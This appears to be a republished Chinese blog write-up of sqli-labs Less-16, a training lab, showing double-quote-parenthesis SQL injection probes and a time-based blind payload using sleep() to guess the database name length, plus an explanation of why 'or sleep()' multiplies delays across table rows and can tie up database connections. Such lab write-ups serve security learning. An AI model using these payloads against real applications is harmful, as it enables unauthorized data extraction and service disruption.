sqli-labs less16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)

Posted superkrissv

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs less16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)相关的知识,希望对你有一定的参考价值。

1‘ or 1=1#              -->失败
1" or 1=1#              -->失败
1‘) or 1=1#             -->失败
1") or 1=1#             -->成功

技术分享图片

判断为双引号变形注入

利用sleep函数判断数据库名长度

1") or if(length(database())=7,1,sleep(5))#

延时确实出现了,但不是5s

在数据库中执行一下

技术分享图片+

技术分享图片

users表中有13条数据,where进行条件匹配时由于sleep(5)返回了1(true)所以寻找username=‘1’,即where后面的条件执行了13次,延时65s

 所以在注入的时候不要轻易使用or sleep()这样的注入

反之,如果构造大量这样的请求就会使得大量数据库连接被滥用,导致正常服务无法进行

参考http://www.freebuf.com/articles/web/101658.html

以上是关于sqli-labs less16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs less11-12(post型union注入)

sqli-labs Less8-Less10

sqli-labs less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)

sqli-labs less13 POST - Double Injection - Single quotes- String -twist (POST型单引号变形双注入)

sqli-labsLess11~Less16

sqli-labs less42 POST -Error based -String -Stacked(POST型基于错误的堆叠查询字符型注入)